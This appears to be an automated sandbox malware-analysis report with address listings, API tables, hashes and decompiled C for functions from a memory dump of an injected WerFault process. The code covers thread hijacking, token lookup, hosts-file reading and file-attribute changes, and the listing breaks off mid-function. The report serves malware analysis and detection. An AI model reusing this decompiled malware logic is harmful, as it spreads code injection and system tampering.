                        0x02870c6d
                        0x02870c71
                        0x02870c75
                        0x00000000
                        0x02870c75
                        0x02870c21
                        0x02870c24
                        0x02870c3c
                        0x02870c3e
                        0x00000000
                        0x00000000
                        0x02870c44
                        0x02870c44
                        0x02870c4b
                        0x02870c51
                        0x02870c51
                        0x00000000
                        0x02870c4b
                        0x02870c26
                        0x02870c26
                        0x02870c2b
                        0x02870c2f
                        0x00000000
                        0x02870c2f
                        0x02870be3
                        0x02870bea
                        0x02870ba2
                        0x02870ba2
                        0x00000000
                        0x02870ba2
                        0x02870b7c
                        0x02870b81
                        0x02870b83
                        0x02870b85
                        0x02870bb0
                        0x02870bb6
                        0x02870bb8
                        0x02870bc7
                        0x02870bc7
                        0x02870bcc
                        0x00000000
                        0x00000000
                        0x02870bd0
                        0x00000000
                        0x02870bd0
                        0x02870bba
                        0x02870bc0
                        0x02870bc5
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02870bc5
                        0x02870b89
                        0x02870b8f
                        0x02870b91
                        0x02870ba9
                        0x02870ba9
                        0x00000000
                        0x02870ba9
                        0x02870b93
                        0x02870b98
                        0x02870b9b
                        0x00000000
                        0x00000000
                        0x02870b9d
                        0x00000000
                        0x02870b9d
                        0x02870af9
                        0x02870ab3
                        0x02870ab7
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02870ab9
                        0x02870a71
                        0x02870a73
                        0x00000000
                        0x02870a73
                        0x02870991
                        0x02870994
                        0x028709d4
                        0x028709d6
                        0x00000000
                        0x028709d6
                        0x02870996
                        0x0287099b
                        0x0287099f
                        0x00000000
                        0x00000000
                        0x028709a9
                        0x028709ae
                        0x028709b0
                        0x028709b5
                        0x028709b9
                        0x00000000
                        0x00000000
                        0x028709bb
                        0x028709bd
                        0x028709bf
                        0x028709bf
                        0x028709bf
                        0x028709c5
                        0x028709ca
                        0x028709cd
                        0x00000000
                        0x028709cf
                        0x028709cf
                        0x028709d1
                        0x00000000
                        0x028709d1
                        0x028709cd
                        0x02870960
                        0x02870968
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02870968
                        0x028708de
                        0x028708de
                        0x028708c1
                        0x00000000
                        0x028708c1

                        APIs
                        • Sleep.KERNEL32(?,?,00000000,00000064,?,00000000,000000C0), ref: 02870CF5
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: Sleep
                        • String ID: DnsFlushResolverCache$LCT$`$d
                        • API String ID: 3472027048-3371752115
                        • Opcode ID: c4e635f21ff8e8e3f2e59139f8e3b03a94f452d0ce2f1bd35034e98889de7907
                        • Instruction ID: 6b865210a2116ca0e58929c77d9888914383cba7838cfbcc26d3533938e63758
                        • Opcode Fuzzy Hash: c4e635f21ff8e8e3f2e59139f8e3b03a94f452d0ce2f1bd35034e98889de7907
                        • Instruction Fuzzy Hash: 46D1C17D9483419FEB20DF68C884BAFB7E9AF84318F08492AE589D3291D770D554CB93
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02865E00 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 199threadCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1532 2865e00-2865e0f 1533 2865e15-2865e2b 1532->1533 1534 2865e11-2865e13 1532->1534 1537 2865e31-2865e42 1533->1537 1538 2865e2d-2865e2f 1533->1538 1535 2865e72-2865e74 1534->1535 1541 2865e44-2865e60 call 28657fd 1537->1541 1542 2865e7c-2865e81 1537->1542 1539 2865e71 1538->1539 1539->1535 1550 2865e77 call 2865809 1541->1550 1551 2865e62-2865e6e call 2865809 1541->1551 1544 2865e83-2865e88 1542->1544 1545 2865e8a-2865e91 call 2865883 1542->1545 1544->1545 1548 2865e9e-2865ea2 1544->1548 1545->1548 1554 2865e93-2865e9c 1545->1554 1552 2865ea4 1548->1552 1553 2865ea8-2865efd call 2880fdb call 286181b call 28614db call 286161b * 2 1548->1553 1550->1542 1562 2865e70 1551->1562 1552->1553 1571 2865f03-2865f05 1553->1571 1572 2866068-286606b 1553->1572 1554->1562 1562->1539 1573 2866075-2866077 1571->1573 1574 2865f0b-2865f6c 1571->1574 1572->1573 1575 286606d-2866070 call 28617e4 1572->1575 1577 2866084-2866087 1573->1577 1578 2866079-286607c 1573->1578 1583 2866044-2866049 1574->1583 1584 2865f72-2865f95 call 2861493 CreateThread 1574->1584 1575->1573 1578->1577 1580 286607e-286607f call 28617e4 1578->1580 1580->1577 1585 2866052-2866057 1583->1585 1586 286604b 1583->1586 1584->1583 1592 2865f9b-2865fb4 1584->1592 1588 2866060-2866066 call 28617e4 1585->1588 1589 2866059 1585->1589 1586->1585 1588->1572 1589->1588 1592->1572 1595 2865fba-2865fc0 1592->1595 1595->1572 1596 2865fc6-2865fdf 1595->1596 1596->1572 1598 2865fe5-2866006 1596->1598 1601 2866015-2866019 1598->1601 1602 2866008-2866010 call 2865aa6 1598->1602 1604 286601b-2866023 call 2865aa6 1601->1604 1605 2866028-286602b 1601->1605 1602->1601 1604->1605 1607 286602d-2866032 1605->1607 1608 2866039-2866042 FindCloseChangeNotification 1605->1608 1607->1608 1609 2866034-2866037 1607->1609 1608->1572 1609->1608
                        C-Code - Quality: 61%
                        			E02865E00(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed short _a16, intOrPtr _a20, intOrPtr* _a24, signed int _a28) {
				long _v8;
				intOrPtr _v12;
				struct _SECURITY_ATTRIBUTES* _v16;
				_Unknown_base(*)()* _v20;
				intOrPtr _v560;
				char _v736;
				void* _t75;
				signed int _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				intOrPtr _t87;
				struct _SECURITY_ATTRIBUTES* _t89;
				intOrPtr _t93;
				intOrPtr _t103;
				intOrPtr _t104;
				void* _t110;
				signed int _t112;
				signed int _t114;
				signed short _t116;
				intOrPtr* _t118;
				signed int _t123;
				struct _SECURITY_ATTRIBUTES* _t128;
				intOrPtr _t129;
				void* _t133;
				struct _SECURITY_ATTRIBUTES* _t136;
				intOrPtr _t137;
				void* _t138;
				void* _t142;

				_t128 = 0;
				if(_a4 == 0) {
					return 0;
				}
				_t75 =  *0x289f71c( *0x289ec34, 0x90, _t133);
				__eflags = _t75 - 1;
				if(_t75 != 1) {
					_t139 = 0x289ec1c;
					 *0x289f8b4(0x289ec1c, _t138);
					__eflags = _a28 & 0x00000010;
					if((_a28 & 0x00000010) == 0) {
						L11:
						__eflags = _a16 - 0x1f;
						if(_a16 == 0x1f) {
							L13:
							_t77 = E02865883();
							__eflags = _t77;
							if(_t77 >= 0) {
								L15:
								__eflags = _a28 & 0x00000001;
								if(__eflags == 0) {
									_t13 =  &_a28;
									 *_t13 = _a28 | 0x00000001;
									__eflags =  *_t13;
								}
								_t79 = E02880FDB(__eflags);
								_t80 = E0286181B(_t129);
								_t82 =  *0x289fdbc;
								_v8 = _t128;
								_v16 = _t128;
								_t22 = _t82 + 0x1f70; // 0x1f70
								_v20 = _t80 % (_t79 + 0xffffd120) + _t22;
								E028614DB(_t129,  &_v736, _t128, 0x2cc);
								_t142 = E0286161B(0x90);
								_t87 = E0286161B(0x90);
								_v12 = _t87;
								__eflags = _t142 - _t128;
								if(_t142 == _t128) {
									L37:
									__eflags = _v12 - _t128;
									if(_v12 != _t128) {
										E028617E4(_v12);
									}
									goto L39;
								} else {
									__eflags = _t87 - _t128;
									if(_t87 == _t128) {
										L39:
										__eflags = _t142 - _t128;
										if(_t142 != _t128) {
											__eflags = _v16 - _t128;
											if(_v16 == _t128) {
												E028617E4(_t142);
											}
										}
										_t128 = _v16;
										_t139 = 0x289ec1c;
										goto L14;
									}
									 *_t142 = 0x90;
									_t93 =  *0x289f890(_t128, 1, _t128, _t128);
									 *((intOrPtr*)(_t142 + 0x74)) = _t93;
									 *((intOrPtr*)(_t142 + 0x78)) =  *0x289f890(_t128, 1, _t128, _t128);
									 *((intOrPtr*)(_t142 + 0x8c)) =  *0x289fdb4;
									 *(_t142 + 8) = _a28;
									 *((short*)(_t142 + 2)) = _a16;
									 *((intOrPtr*)(_t142 + 4)) = _a20;
									 *((intOrPtr*)(_t142 + 0xc)) = _a12;
									 *((intOrPtr*)(_t142 + 0x10)) = _a8;
									 *((intOrPtr*)(_t142 + 0x84)) = _a4;
									 *((intOrPtr*)(_t142 + 0x88)) = _v20;
									__eflags =  *((intOrPtr*)(_t142 + 0x74)) - _t128;
									if( *((intOrPtr*)(_t142 + 0x74)) == _t128) {
										L32:
										_t103 =  *((intOrPtr*)(_t142 + 0x74));
										__eflags = _t103 - _t128;
										if(_t103 != _t128) {
											 *0x289f824(_t103);
										}
										_t104 =  *((intOrPtr*)(_t142 + 0x78));
										__eflags = _t104 - _t128;
										if(_t104 != _t128) {
											 *0x289f824(_t104);
										}
										E028617E4(_t142);
										_t142 = 0;
										__eflags = 0;
										goto L37;
									}
									E02861493(_t129, _v12, _t142, 0x90);
									_t110 = CreateThread(_t128, _t128, _v20, _t142, 4,  &_v8); // executed
									_t136 = _t110;
									_v16 = _t136;
									__eflags = _t136 - _t128;
									if(_t136 == _t128) {
										goto L32;
									}
									_v736 = 0x10007;
									_t112 = L02887534(_t136,  &_v736); // executed
									__eflags = _t112;
									if(_t112 != 0) {
										__eflags = _v560 - _t128;
										if(_v560 != _t128) {
											_v560 = E028660AA;
											_t114 = L028874C3(_t136,  &_v736); // executed
											__eflags = _t114;
											if(_t114 != 0) {
												 *(_t142 + 0x7c) = _t136;
												L02887364(_t129, _t136); // executed
												_t137 = _v12;
												_t116 =  *0x289f8a4( *(_t137 + 0x74), 0x5dc);
												__eflags = _a28 & 0x00000008;
												_a16 = _t116;
												if((_a28 & 0x00000008) != 0) {
													E02865AA6(_t129, _v8, 0x11b); // executed
												}
												__eflags = _a28 & 0x00000040;
												if((_a28 & 0x00000040) != 0) {
													E02865AA6(_t129, _v8, 0x10b); // executed
												}
												__eflags = _a16 - _t128;
												if(_a16 == _t128) {
													_t118 = _a24;
													__eflags = _t118 - _t128;
													if(_t118 != _t128) {
														 *_t118 = _v8;
													}
												}
												FindCloseChangeNotification( *(_t137 + 0x74)); // executed
											}
										}
									}
									goto L37;
								}
							}
							L14:
							 *0x289f8b8(_t139);
							_t89 = _t128;
							L7:
							goto L8;
						}
						__eflags = _a16 - 0x20;
						if(_a16 != 0x20) {
							goto L15;
						}
						goto L13;
					}
					E028657FD();
					_t129 =  *0x289ec34;
					_t123 = (_a16 & 0x0000ffff) * 0x90;
					__eflags =  *(_t123 + _t129 + 0x84);
					if( *(_t123 + _t129 + 0x84) == 0) {
						E02865809();
						goto L11;
					} else {
						E02865809();
						 *0x289f8b8(0x289ec1c);
						_t89 = 0;
						__eflags = 0;
						goto L7;
					}
				} else {
					_t89 = 0;
					L8:
					return _t89;
				}
			}
































                        0x02865e0a
                        0x02865e0f
                        0x00000000
                        0x02865e11
                        0x02865e22
                        0x02865e28
                        0x02865e2b
                        0x02865e32
                        0x02865e38
                        0x02865e3e
                        0x02865e42
                        0x02865e7c
                        0x02865e7c
                        0x02865e81
                        0x02865e8a
                        0x02865e8a
                        0x02865e8f
                        0x02865e91
                        0x02865e9e
                        0x02865e9e
                        0x02865ea2
                        0x02865ea4
                        0x02865ea4
                        0x02865ea4
                        0x02865ea4
                        0x02865ead
                        0x02865eb4
                        0x02865ec3
                        0x02865ece
                        0x02865ed1
                        0x02865ed4
                        0x02865edb
                        0x02865ee5
                        0x02865ef1
                        0x02865ef3
                        0x02865ef8
                        0x02865efb
                        0x02865efd
                        0x02866068
                        0x02866068
                        0x0286606b
                        0x02866070
                        0x02866070
                        0x00000000
                        0x02865f03
                        0x02865f03
                        0x02865f05
                        0x02866075
                        0x02866075
                        0x02866077
                        0x02866079
                        0x0286607c
                        0x0286607f
                        0x0286607f
                        0x0286607c
                        0x02866084
                        0x02866087
                        0x00000000
                        0x02866087
                        0x02865f12
                        0x02865f15
                        0x02865f20
                        0x02865f29
                        0x02865f31
                        0x02865f3a
                        0x02865f41
                        0x02865f48
                        0x02865f4e
                        0x02865f54
                        0x02865f5a
                        0x02865f63
                        0x02865f69
                        0x02865f6c
                        0x02866044
                        0x02866044
                        0x02866047
                        0x02866049
                        0x0286604c
                        0x0286604c
                        0x02866052
                        0x02866055
                        0x02866057
                        0x0286605a
                        0x0286605a
                        0x02866061
                        0x02866066
                        0x02866066
                        0x00000000
                        0x02866066
                        0x02865f77
                        0x02865f88
                        0x02865f8e
                        0x02865f90
                        0x02865f93
                        0x02865f95
                        0x00000000
                        0x00000000
                        0x02865fa3
                        0x02865fad
                        0x02865fb2
                        0x02865fb4
                        0x02865fba
                        0x02865fc0
                        0x02865fce
                        0x02865fd8
                        0x02865fdd
                        0x02865fdf
                        0x02865fe6
                        0x02865fe9
                        0x02865fee
                        0x02865ff9
                        0x02865fff
                        0x02866003
                        0x02866006
                        0x02866010
                        0x02866010
                        0x02866015
                        0x02866019
                        0x02866023
                        0x02866023
                        0x02866028
                        0x0286602b
                        0x0286602d
                        0x02866030
                        0x02866032
                        0x02866037
                        0x02866037
                        0x02866032
                        0x0286603c
                        0x0286603c
                        0x02865fdf
                        0x02865fc0
                        0x00000000
                        0x02865fb4
                        0x02865efd
                        0x02865e93
                        0x02865e94
                        0x02865e9a
                        0x02865e70
                        0x00000000
                        0x02865e70
                        0x02865e83
                        0x02865e88
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02865e88
                        0x02865e44
                        0x02865e4d
                        0x02865e53
                        0x02865e59
                        0x02865e60
                        0x02865e77
                        0x00000000
                        0x02865e62
                        0x02865e62
                        0x02865e68
                        0x02865e6e
                        0x02865e6e
                        0x00000000
                        0x02865e6e
                        0x02865e2d
                        0x02865e2d
                        0x02865e71
                        0x00000000
                        0x02865e71

                        APIs
                        • CreateThread.KERNEL32(00000000,00000000,00000000,00000000,00000004,?,?,00000000,00000090), ref: 02865F88
                        • FindCloseChangeNotification.KERNEL32(?), ref: 0286603C
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: ChangeCloseCreateFindNotificationThread
                        • String ID: $@
                        • API String ID: 4060959955-1077428164
                        • Opcode ID: 5914eeb974e939451077daf874160b7a7baddd39200c2509f227f126d219a916
                        • Instruction ID: 7a6a3a2c7db3acde05b45846e3bd1b5fb9ddcda1a7e7a24c5fa7e3eaa88c2704
                        • Opcode Fuzzy Hash: 5914eeb974e939451077daf874160b7a7baddd39200c2509f227f126d219a916
                        • Instruction Fuzzy Hash: C571647D900259ABCF21DFA4C98CABE7BF9BF04304F14446AEA49F2651D7389950CF51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028890B6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120fileCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileW.KERNEL32(-00000058,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000,00000000,?,?,02889335,00000000,?,00000000), ref: 0288914D
                        • CreateFileMappingW.KERNELBASE(00000000,00000000,01000002,00000000,00000000,00000000,?,?,02889335,00000000,?,00000000,00000000,0000A8C0,0000A8C0,-00000058), ref: 0288916E
                        • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,?,02889335,00000000,?,00000000,00000000,0000A8C0,0000A8C0,-00000058,0289EEAC), ref: 02889190
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$Create$MappingView
                        • String ID: P
                        • API String ID: 1299149932-3110715001
                        • Opcode ID: c5e76cab029246ccce1c436dd879060cbb4e13a1792c3278b81a890ecb0b89de
                        • Instruction ID: 320af07308aa49d2af087eda0f0ccdc9798913f901219258a93d2dfe52a6b366
                        • Opcode Fuzzy Hash: c5e76cab029246ccce1c436dd879060cbb4e13a1792c3278b81a890ecb0b89de
                        • Instruction Fuzzy Hash: 0131F23DA44118FBEB146B68CC4CBBE36A8EF05365F244619F926E77C0D7758A01CB61
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02864B40 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 99COMMON
                        Download Yara Rule
                        C-Code - Quality: 17%
                        			E02864B40(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				void* _v8;
				long _v12;
				char _v16;
				char _v20;
				char _v540;
				char _v1060;
				int _t35;
				int _t41;
				void* _t52;
				void* _t56;

				if(_a4 == 0 || _a8 == 0) {
					L14:
					return 0;
				} else {
					_v12 = 0;
					_v16 = 0x103;
					_v8 = 0;
					_t52 = 0;
					E028614DB(__ecx,  &_v1060, 0, 0x208);
					E028614DB(__ecx,  &_v540, 0, 0x208);
					_push( &_v8);
					_push(8);
					_push(_a4);
					if( *0x289fb54() == 0 || _v8 == 0) {
						goto L14;
					} else {
						_t35 = GetTokenInformation(_v8, 1, 0, 0,  &_v12); // executed
						if(_t35 == 0 &&  *0x289f884() == 0x7a) {
							_t56 = E0286161B(_v12);
							if(_t56 != 0) {
								_t41 = GetTokenInformation(_v8, 1, _t56, _v12,  &_v12); // executed
								if(_t41 != 0) {
									_push( &_v20);
									_push( &_v16);
									_push( &_v540);
									_push( &_v16);
									_push( &_v1060);
									_push( *_t56);
									_push(0);
									if( *0x289fb84() != 0) {
										 *0x289fa88(_a8, L"%s\\%s",  &_v1060,  &_v540);
										_t52 = 1;
									}
								}
								E028617E4(_t56);
							}
						}
						if(_v8 != 0) {
							FindCloseChangeNotification(_v8); // executed
						}
						return _t52;
					}
				}
			}













                        0x02864b51
                        0x02864c54
                        0x00000000
                        0x02864b60
                        0x02864b6e
                        0x02864b71
                        0x02864b78
                        0x02864b7b
                        0x02864b7d
                        0x02864b8b
                        0x02864b93
                        0x02864b94
                        0x02864b96
                        0x02864ba1
                        0x00000000
                        0x02864bb0
                        0x02864bbb
                        0x02864bc3
                        0x02864bd8
                        0x02864bdc
                        0x02864beb
                        0x02864bf3
                        0x02864bf8
                        0x02864bfc
                        0x02864c03
                        0x02864c07
                        0x02864c0e
                        0x02864c0f
                        0x02864c11
                        0x02864c1a
                        0x02864c32
                        0x02864c3b
                        0x02864c3b
                        0x02864c1a
                        0x02864c3d
                        0x02864c3d
                        0x02864bdc
                        0x02864c45
                        0x02864c4a
                        0x02864c4a
                        0x00000000
                        0x02864c50
                        0x02864ba1

                        APIs
                        • GetTokenInformation.KERNELBASE(00000208,00000001,00000000,00000000,00000000), ref: 02864BBB
                        • GetTokenInformation.KERNELBASE(00000208,00000001,00000000,00000000,00000000,00000000), ref: 02864BEB
                        • FindCloseChangeNotification.KERNEL32(00000208), ref: 02864C4A
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: InformationToken$ChangeCloseFindNotification
                        • String ID: %s\%s
                        • API String ID: 671759997-4073750446
                        • Opcode ID: bf372da26b3772fd43132810c32cfda415ebf6f98abd7e5ee4ee0821d181291d
                        • Instruction ID: 78a2ef0ccac529309dd73ea8a3df3469db27270856a83562cc4d6e831c1110b5
                        • Opcode Fuzzy Hash: bf372da26b3772fd43132810c32cfda415ebf6f98abd7e5ee4ee0821d181291d
                        • Instruction Fuzzy Hash: 70318C7E900108BEEF26DF95DC88EEEBBBDEB54344F1441A6B619E2140D7309A64CB60
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0288543C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86fileCOMMON
                        Download Yara Rule
                        C-Code - Quality: 47%
                        			E0288543C(void* __ecx, void* __esi) {
				void* _v8;
				struct _OVERLAPPED* _v12;
				long _v16;
				short _v536;
				void* _t24;
				void* _t28;
				int _t34;
				void* _t37;
				long _t39;

				_v16 = 0;
				_t37 = 0;
				_v12 = 0;
				E028614DB(__ecx,  &_v536, 0, 0x208);
				_push(0xe4);
				_push( &_v536);
				if( *0x289f738() != 0) {
					 *0x289fc70( &_v536, L"drivers\\etc\\hosts");
					_t24 = CreateFileW( &_v536, 0x80000000, 1, 0, 3, 0, 0); // executed
					_v8 = _t24;
					if(_t24 != 0xffffffff) {
						_t39 =  *0x289f778(_t24, 0, __esi);
						if(_t39 <= 6) {
							L7:
							E028617E4(_t37);
						} else {
							_t8 = _t39 + 1; // 0x1
							_t37 = E0286161B(_t8);
							if(_t37 == 0) {
								goto L7;
							} else {
								_t34 = ReadFile(_v8, _t37, _t39,  &_v16, 0); // executed
								if(_t34 == 0 || _v16 <= 6) {
									goto L7;
								} else {
									_v12 = 1;
								}
							}
						}
						 *0x289f824(_v8);
						if(_v12 == 1) {
							_t28 = 0;
							while( *((intOrPtr*)(_t28 + _t37)) != 0) {
								_t28 = _t28 + 1;
								if(_t28 < 4) {
									continue;
								} else {
								}
								goto L14;
							}
							E028617E4(_t37);
							_t37 = E02861768(_t37);
						}
					}
				}
				L14:
				return _t37;
			}












                        0x02885456
                        0x02885459
                        0x0288545b
                        0x0288545e
                        0x02885463
                        0x0288546e
                        0x02885477
                        0x02885489
                        0x028854a2
                        0x028854a8
                        0x028854ae
                        0x028854b9
                        0x028854be
                        0x028854f2
                        0x028854f3
                        0x028854c0
                        0x028854c0
                        0x028854c9
                        0x028854cd
                        0x00000000
                        0x028854cf
                        0x028854d9
                        0x028854e1
                        0x00000000
                        0x028854e9
                        0x028854e9
                        0x028854e9
                        0x028854e1
                        0x028854cd
                        0x028854fb
                        0x02885506
                        0x02885508
                        0x0288550a
                        0x0288550f
                        0x02885513
                        0x00000000
                        0x00000000
                        0x02885515
                        0x00000000
                        0x02885513
                        0x02885518
                        0x02885523
                        0x02885523
                        0x02885506
                        0x028854ae
                        0x02885525
                        0x0288552a

                        APIs
                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 028854A2
                        • ReadFile.KERNEL32(?,00000000,00000000,?,00000000,00000001), ref: 028854D9
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$CreateRead
                        • String ID: LCT$drivers\etc\hosts
                        • API String ID: 3388366904-2045763994
                        • Opcode ID: 2715aef7ad36addb11c65392acf3af09dd96ca3bd02a671439042fb089af8b0a
                        • Instruction ID: a22288ccd40fbd8bc3f5f17bfa8f60f9a41ec0291e8409d99a20ca5b9d24dd41
                        • Opcode Fuzzy Hash: 2715aef7ad36addb11c65392acf3af09dd96ca3bd02a671439042fb089af8b0a
                        • Instruction Fuzzy Hash: 2621C47DD40218BFDB10BBB89C8CEAE77FDEB04309F558865F109E2140E7398A448B21
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0286397D Relevance: 6.1, APIs: 4, Instructions: 80threadprocessCOMMON
                        Download Yara Rule
                        C-Code - Quality: 84%
                        			E0286397D(intOrPtr* _a4) {
				void* _v8;
				intOrPtr _v12;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v40;
				intOrPtr* _t17;
				signed int _t18;
				void* _t20;
				int _t24;
				intOrPtr _t25;
				int _t27;
				intOrPtr _t33;
				void* _t35;
				void* _t36;
				signed int _t40;
				intOrPtr _t43;

				_t17 = _a4;
				_t40 = 0;
				if(_t17 == 0 ||  *_t17 != 0xa94) {
					_t18 = 0;
					goto L10;
				} else {
					_t33 =  *((intOrPtr*)(_t17 + 0xc));
					_v12 = _t33;
					_t43 = E0286161B(0xfa0);
					if(_t43 == 0 || _t33 == 0) {
						L8:
						_t18 = 0;
						goto L9;
					} else {
						_t20 = CreateToolhelp32Snapshot(4, 0); // executed
						_v8 = _t20;
						if(_t20 == 0xffffffff) {
							goto L8;
						}
						_t35 = 0x1c;
						E028614DB(0xa94,  &_v40, 0, _t35);
						_v40 = _t35;
						_t36 = _v8;
						_t24 = Thread32First(_t36,  &_v40); // executed
						if(_t24 != 0) {
							do {
								_t25 = _v32;
								if(_t25 != 0 && _v28 == _v12) {
									 *((intOrPtr*)(_t43 + _t40 * 4)) = _t25;
									_t40 = _t40 + 1;
									if(_t40 >= 0x3e8) {
										break;
									}
								}
								_t27 = Thread32Next(_t36,  &_v40); // executed
							} while (_t27 != 0);
							FindCloseChangeNotification(_t36); // executed
							if(_t40 == 0) {
								E028617E4(_t43);
								_t43 = 0;
							}
							 *((intOrPtr*)(_a4 + 0x668)) = _t43;
							_t18 = _t40;
							L9:
							L10:
							return _t18;
						}
						 *0x289f824(_t36);
						goto L8;
					}
				}
			}



















                        0x02863980
                        0x02863987
                        0x0286398b
                        0x02863997
                        0x00000000
                        0x0286399b
                        0x0286399c
                        0x028639a5
                        0x028639ad
                        0x028639b1
                        0x028639f3
                        0x028639f3
                        0x00000000
                        0x028639b7
                        0x028639ba
                        0x028639c0
                        0x028639c6
                        0x00000000
                        0x00000000
                        0x028639ca
                        0x028639d2
                        0x028639da
                        0x028639dd
                        0x028639e2
                        0x028639ea
                        0x028639fc
                        0x028639fc
                        0x02863a01
                        0x02863a0b
                        0x02863a0e
                        0x02863a15
                        0x00000000
                        0x00000000
                        0x02863a15
                        0x02863a1c
                        0x02863a22
                        0x02863a27
                        0x02863a2f
                        0x02863a32
                        0x02863a37
                        0x02863a37
                        0x02863a3c
                        0x02863a42
                        0x028639f5
                        0x028639f7
                        0x028639f9
                        0x028639f9
                        0x028639ed
                        0x00000000
                        0x028639ed
                        0x028639b1

                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000,00000FA0,00000A94,00000000,028A0044,?,02865B8E,?,?,00000000,00000A94,028A0044,?,00000000), ref: 028639BA
                        • Thread32First.KERNEL32(00000000,?,?,00000000,0000001C,?,02865B8E,?,?,00000000,00000A94,028A0044,?,00000000), ref: 028639E2
                        • Thread32Next.KERNEL32(00000000,?,?,02865B8E,?,?,00000000,00000A94,028A0044,?,00000000), ref: 02863A1C
                        • FindCloseChangeNotification.KERNEL32(00000000,?,02865B8E,?,?,00000000,00000A94,028A0044,?,00000000), ref: 02863A27
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: Thread32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
                        • String ID:
                        • API String ID: 3913586313-0
                        • Opcode ID: 61463d99ff4e740fc037bee02b8ef35920cc0a7746bf20122f6e81df404a7431
                        • Instruction ID: fd2035fd212f12b17d93f6b74a56968e0599da25faae0ed5f0af423ac3df9f0f
                        • Opcode Fuzzy Hash: 61463d99ff4e740fc037bee02b8ef35920cc0a7746bf20122f6e81df404a7431
                        • Instruction Fuzzy Hash: 1521C77DA00205AEDB10DB78CC8CFBE77F8AB49B56F1405A9E90AE3181D735D940CB60
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028833DE Relevance: 6.1, APIs: 4, Instructions: 59fileCOMMON
                        Download Yara Rule
                        C-Code - Quality: 79%
                        			E028833DE() {
				long _t3;
				void* _t7;
				struct _SECURITY_ATTRIBUTES* _t16;
				WCHAR* _t19;
				long _t21;
				void* _t24;

				_t19 =  *0x289f2e8 + 0x1646;
				_t16 = 0;
				if(E028619E8(_t19) >= 6) {
					if( *0x28a0660 != 0) {
						goto L1;
					} else {
						_t3 = GetFileAttributesW(_t19); // executed
						_t21 = _t3;
						if(_t21 != 0x80) {
							SetFileAttributesW( *0x289f2e8 + 0x1646, 0x80); // executed
						}
						_t7 = CreateFileW( *0x289f2e8 + 0x1646, 0x10000, 3, _t16, 3, _t16, _t16); // executed
						_t24 = _t7;
